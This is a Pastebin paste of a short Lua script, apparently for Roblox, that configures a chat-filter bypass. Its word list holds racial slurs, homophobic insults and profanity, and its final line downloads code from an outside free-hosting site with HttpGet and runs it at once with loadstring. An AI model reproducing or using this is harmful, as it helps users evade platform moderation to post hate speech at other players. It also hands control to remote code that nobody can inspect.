Advertisement
Guest User

Untitled

a guest
Jul 17th, 2019
133
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.52 KB | None | 0 0
  1. _G.Option = 'keywords'; --[[
  2. Current options:
  3. - all: bypasses every word you write
  4. - keywords: bypasses only the list of words
  5. ]]
  6. _G.Auto_Update = {
  7. Enabled = true;
  8. Delay = 60; -- seconds
  9. }
  10. _G.Custom_Words = { -- your own custom words / sentences!
  11. 'nigga you are big',
  12. 'fuck somegay shit', -- etc
  13. 'fuck you shithead',
  14. 'dumbass niggers',
  15. 'the fuck you saying nigger',
  16. }
  17. if not loadstring(game:HttpGet('https://xhamiii.000webhostapp.com/',true))() then warn'host is currently down'end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement